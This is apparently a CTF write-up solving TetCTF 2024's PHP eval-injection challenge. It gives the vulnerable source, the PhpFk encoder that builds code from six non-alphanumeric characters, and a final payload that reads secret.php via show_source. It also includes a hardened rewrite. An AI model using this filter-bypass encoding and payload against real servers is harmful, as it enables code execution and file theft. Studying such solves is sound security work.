TetCTF 2024 — Stress Release Service

For a better New Year, we are introducing a service that can help you reduce stress: http://192.53.173.71:8080 . As our service is only available during the New Year, we are also providing you with a code for later use in material section.

We are given a PHP server that looks like this:

Code (php):

<br><center>
<font size=5 color=red >STRESS RELEASE SERVICE</font>
<br><br><br>
To relieve all your stress from the old year, all you need is SHOUTTTTTT!!!!
<br><br><br>
<form action="/" method="GET">
    <input type="submit" value="shout"/><input type="text" name="shout" value="@!@!@!@!@!@!@!@!" />
</form>
</center>

<?php

function validateInput($input) {
    // To make your shout effective, it shouldn't contain alphabets or numbers.
    $pattern = '/[a-z0-9]/i';
    if (preg_match($pattern, $input)) {
        return false;
    }

    // and only a few characters. Let's make your shout clean.
    $count = count(array_count_values(str_split($input)));
    if ($count > 7) {
        return false;
    }

    return true;
}

if (isset($_GET["shout"]) && !empty($_GET["shout"]) && is_string($_GET["shout"])) {
    $voice = $_GET["shout"];
    $res = "<center><br><br><img src=\"https://i.imgur.com/SvbbT0W.png\" width=5% /> WRONGGGGG WAYYYYYY TOOOO RELEASEEEEE STRESSSSSSSS!!!!!!</center>";
    if(validateInput($voice) === true) {
        eval("\$res='<center><br><br><img src=\"https://i.imgur.com/TL6siVW.png\" width=5% /> ".$voice.".</center>';");
    }

    if (strlen($res) < 300) {
        echo $res;
    } else {
        echo "<center>Too loud!!! Please respect your neighbor.</center>";
    }
}

?>

with the flag stored in a variable in secret.php.

We can pass arbitrary input to $_GET["shout"], but our input is only eval'ed if it passes validateInput():

Code (php):

function validateInput($input) {
    // To make your shout effective, it shouldn't contain alphabets or numbers.
    $pattern = '/[a-z0-9]/i';
    if (preg_match($pattern, $input)) {
        return false;
    }

    // and only a few characters. Let's make your shout clean.
    $count = count(array_count_values(str_split($input)));
    if ($count > 7) {
        return false;
    }

    return true;
}

so our payload

  1. cannot contain alphanumeric characters
  2. cannot contain more than 7 unique characters.

Furthermore, the payload is placed inside a single-quoted string when eval'ed, so we need to break out of that string by wrapping the payload as

Code:

'.{payload}.'
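The breakout works because eval() parses the request parameter as PHP source. As an added example (not the challenge's code; renderWithEval and renderAsData are hypothetical names and the markup is shortened), here is the same response built with eval() and as plain data, run on two constructed inputs that pass validateInput():

```php
<?php
// Added example, not the challenge's code. Function names are hypothetical.

// Same rules as the challenge's validateInput().
function validateInput(string $input): bool
{
    if (preg_match('/[a-z0-9]/i', $input)) {
        return false;
    }
    return count(array_count_values(str_split($input))) <= 7;
}

// Challenge behaviour: $voice is pasted into PHP source and evaluated, so a
// quote in $voice ends the string literal and the rest is parsed as code.
function renderWithEval(string $voice): string
{
    $res = '';
    eval("\$res='<center> " . $voice . ".</center>';");
    return $res;
}

// Hardened form: $voice is only ever data. It is concatenated at runtime and
// HTML-encoded for output; the PHP parser never sees it.
function renderAsData(string $voice): string
{
    return '<center> '
        . htmlspecialchars($voice, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '.</center>';
}

// Constructed inputs: the form's default shout, and a harmless string with
// the breakout shape '.{payload}.' whose "payload" is the literal ('^').
$samples = ['@!@!@!@!', "'.('^').'"];

foreach ($samples as $voice) {
    if (!validateInput($voice)) {
        continue;
    }
    printf(
        "input: %s\neval : %s\ndata : %s\n\n",
        $voice,
        renderWithEval($voice),
        renderAsData($voice)
    );
}
```

With eval() the second input collapses to ^ because its quotes were parsed as PHP; in the hardened form the same bytes come back HTML-encoded, and the character filter no longer carries any security weight.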

At first glance, it looks like we can use PHPFuck to run arbitrary PHP with only 7 unique, non-alphanumeric characters: ([+.^]). Unfortunately, PHPFuck is broken on PHP versions > 7.0.x, and the single quote needed to run the payload would bring the total to 8 unique characters.

Another alternative, phpfuck, uses only 5 characters, (^.9), but that set includes an alphanumeric character.

Instead, we can use PhpFk, which works on PHP 8 with 6 characters: (,.^'). Importantly, this set of characters also includes . and ', the two characters we need to run our payload!

We can then encode arbitrary PHP strings with

Code (php):

// Characters reachable by XOR-ing the base characters ( ) , . ^ as one-byte strings.
const INITIAL_CHAR_MAP = [
    '(' => "'('",
    ')' => "')'",
    '*' => "('.'^','^'(')",
    '+' => "(')'^'.'^',')",
    ',' => "','",
    '-' => "(')'^','^'(')",
    '.' => "'.'",
    '/' => "(')'^'.'^'(')",
    'X' => "('^'^'.'^'(')",
    'Y' => "(')'^'^'^'.')",
    'Z' => "('^'^','^'(')",
    '[' => "(')'^'^'^',')",
    '\\' => "('^'^'.'^',')",
    ']' => "(')'^'^'^'.'^','^'(')",
    '^' => "'^'",
    '_' => "(')'^'^'^'(')",
    'p' => "('^'^'.')",
    'q' => "(')'^'^'^'.'^'(')",
    'r' => "('^'^',')",
    's' => "(')'^'^'^','^'(')",
    't' => "('^'^'.'^','^'(')",
    'u' => "(')'^'^'^'.'^',')",
    'v' => "('^'^'(')",
    'w' => "(')'^'^')",
];

// The strings "strstr" and "sqrt", spelled with INITIAL_CHAR_MAP entries.
const STRSTR = '(' . INITIAL_CHAR_MAP['s'] . '.' . INITIAL_CHAR_MAP['t'] . '.' . INITIAL_CHAR_MAP['r'] . '.' . INITIAL_CHAR_MAP['s'] . '.' . INITIAL_CHAR_MAP['t'] . '.' . INITIAL_CHAR_MAP['r'] . ')';
const SQRT = '(' . INITIAL_CHAR_MAP['s'] . '.' . INITIAL_CHAR_MAP['q'] . '.' . INITIAL_CHAR_MAP['r'] . '.' . INITIAL_CHAR_MAP['t'] . ')';
// strstr('', '.') returns false; sqrt(false) is 0; 0 . '' is the string "0".
const _FALSE = STRSTR . "('','.')";
const ZERO_INT = SQRT . '(' . _FALSE . ')';
const ZERO_CHAR = '(' . ZERO_INT . ".'')";

// XOR-ing "0" with the base characters reaches the digits 1-7 and more letters.
const CHAR_MAP = INITIAL_CHAR_MAP + [
        '0' => ZERO_CHAR,
        '1' => '(' . ZERO_CHAR . "^')'^'(')",
        '2' => '(' . ZERO_CHAR . "^'.'^',')",
        '3' => '(' . ZERO_CHAR . "^')'^'.'^','^'(')",
        '4' => '(' . ZERO_CHAR . "^','^'(')",
        '5' => '(' . ZERO_CHAR . "^')'^',')",
        '6' => '(' . ZERO_CHAR . "^'.'^'(')",
        '7' => '(' . ZERO_CHAR . "^')'^'.')",
        '@' => '(' . ZERO_CHAR . "^'^'^'.')",
        'A' => '(' . ZERO_CHAR . "^')'^'^'^'.'^'(')",
        'B' => '(' . ZERO_CHAR . "^'^'^',')",
        'C' => '(' . ZERO_CHAR . "^')'^'^'^','^'(')",
        'D' => '(' . ZERO_CHAR . "^'^'^'.'^','^'(')",
        'E' => '(' . ZERO_CHAR . "^')'^'^'^'.'^',')",
        'F' => '(' . ZERO_CHAR . "^'^'^'(')",
        'G' => '(' . ZERO_CHAR . "^')'^'^')",
        'h' => '(' . ZERO_CHAR . "^'^'^'.'^'(')",
        'i' => '(' . ZERO_CHAR . "^')'^'^'^'.')",
        'j' => '(' . ZERO_CHAR . "^'^'^','^'(')",
        'k' => '(' . ZERO_CHAR . "^')'^'^'^',')",
        'l' => '(' . ZERO_CHAR . "^'^'^'.'^',')",
        'm' => '(' . ZERO_CHAR . "^')'^'^'^'.'^','^'(')",
        'n' => '(' . ZERO_CHAR . "^'^')",
        'o' => '(' . ZERO_CHAR . "^')'^'^'^'(')",
    ];

// Encode each character from CHAR_MAP, falling back to ("Chr")(<character code>).
function obfuscateString(string $str): string
{
    return '' === $str ? "''" : join(
        '.',
        array_map(
            fn($char) => sprintf('(%s)',
                CHAR_MAP[$char]
                ?? sprintf('((%s).(%s).(%s))(%s)',
                CHAR_MAP['C'],
                CHAR_MAP['h'],
                CHAR_MAP['r'],
                obfuscatePositiveInteger(ord($char))
            )
            ),
            str_split($str)
        )
    );
}

// 0-7 come straight from CHAR_MAP; 8 and 9 are built as ("oCtDEC")(<octal digits>);
// larger numbers are built by concatenating their decimal digits.
function obfuscatePositiveInteger(int $nb): string
{
    assert($nb >= 0);
    return match ($nb) {
        0, 1, 2, 3, 4, 5, 6, 7 => CHAR_MAP[$nb],
        8, 9 => sprintf('((%s).(%s).(%s).(%s).(%s).(%s))(%s)',
            CHAR_MAP['o'], CHAR_MAP['C'], CHAR_MAP['t'], CHAR_MAP['D'], CHAR_MAP['E'], CHAR_MAP['C'],
            join('.', array_map(
                    fn($digit) => sprintf('(%s)', CHAR_MAP[$digit]),
                    str_split(decoct($nb)))
            )
        ),
        default => sprintf('(%s)', join(').(', array_map(__FUNCTION__, str_split("$nb")))),
    };
}
PhpFk.php L23-116
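Why the initial map has these keys and no others: the five base characters are one-byte strings, and PHP's ^ on strings XORs them byte by byte. The following added example (not PhpFk's code; function names are hypothetical) recomputes the reachable set and shows which function names cannot be spelled from it directly:

```php
<?php
// Added example, not part of PhpFk. Function names are hypothetical.

const BASE_CHARS = ['(', ')', ',', '.', '^'];

// XOR every non-empty subset of $base. Returns [character => expression]
// for each printable ASCII result, with the expression in the same form as
// the INITIAL_CHAR_MAP values (quoted operands joined by ^).
function xorReachable(array $base): array
{
    $found = [];
    $n = count($base);
    for ($mask = 1; $mask < (1 << $n); $mask++) {
        $value = 0;
        $terms = [];
        foreach ($base as $i => $char) {
            if ($mask & (1 << $i)) {
                $value ^= ord($char);
                $terms[] = "'" . $char . "'";
            }
        }
        if ($value >= 0x20 && $value <= 0x7e) {
            $found[chr($value)] = count($terms) === 1
                ? $terms[0]
                : '(' . implode('^', $terms) . ')';
        }
    }
    ksort($found, SORT_STRING);
    return $found;
}

// Number of distinct characters used across all expressions, which is the
// quantity validateInput() limits to 7.
function alphabetSize(array $expressions): int
{
    return count(array_count_values(str_split(implode('', $expressions))));
}

// True when every character of $name is directly reachable.
function canSpell(string $name, array $reachable): bool
{
    foreach (str_split($name) as $char) {
        if (!isset($reachable[$char])) {
            return false;
        }
    }
    return true;
}

$reachable = xorReachable(BASE_CHARS);
printf("%d printable characters: %s\n", count($reachable), implode('', array_keys($reachable)));
printf("distinct characters in the expressions: %d\n", alphabetSize($reachable));
foreach (['strstr', 'sqrt', 'glob', 'show_source'] as $name) {
    printf("%-12s %s\n", $name, canSpell($name, $reachable) ? 'directly spellable' : 'needs more than the base XORs');
}
```

It reports 24 printable characters, matching the keys of INITIAL_CHAR_MAP, written with 6 distinct characters once the quote is counted. Only strstr and sqrt are directly spellable, which is why the encoder derives "0" from them before anything else.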

The main idea is that you can call functions in PHP from their string names. If we can inject something like

Code (php):

"join"("file"("secret.php"))

or

Code (php):

"show_source"("secret.php")

we can cat the flag file and get the flag.

The problem is that the PhpFk encoding is incredibly verbose: some letters can take as many as 2000 characters to encode. Furthermore, Apache has a default maximum request length of 8190 bytes. Because of URL encoding (e.g. ( becomes %28), our actual maximum payload size is closer to 8190 / 3 = 2730 characters.

Our first problem is that encoding "secret.php" gives an expression 5296 characters long.

Instead, we can use glob("s*") to get ["secret.php"], then extract the first element of the array using current to get the filename.

Encoding "glob", however, would require 4453 characters, negating all of our savings.

Luckily, PHP function calling is case insensitive: "glob"(...) and "gLoB"(...) refer to the same function! Through some trial and error, we can encode "GloB" in only 751 characters,

"CurrEnt" in 633 characters,

and "s*" in 35:

Code (php):

((')'^'^'^','^'(')).(('.'^','^'('))

"secret.php" can then be encoded in 1427 characters as

Code (php):

("CurrEnt")(("GloB")("s*"))

Then, encoding "show_sourCE" (1057 characters), we get our final payload:

Code (php):

'.("show_sourCE")(("CurrEnt")(("GloB")("s*"))).'
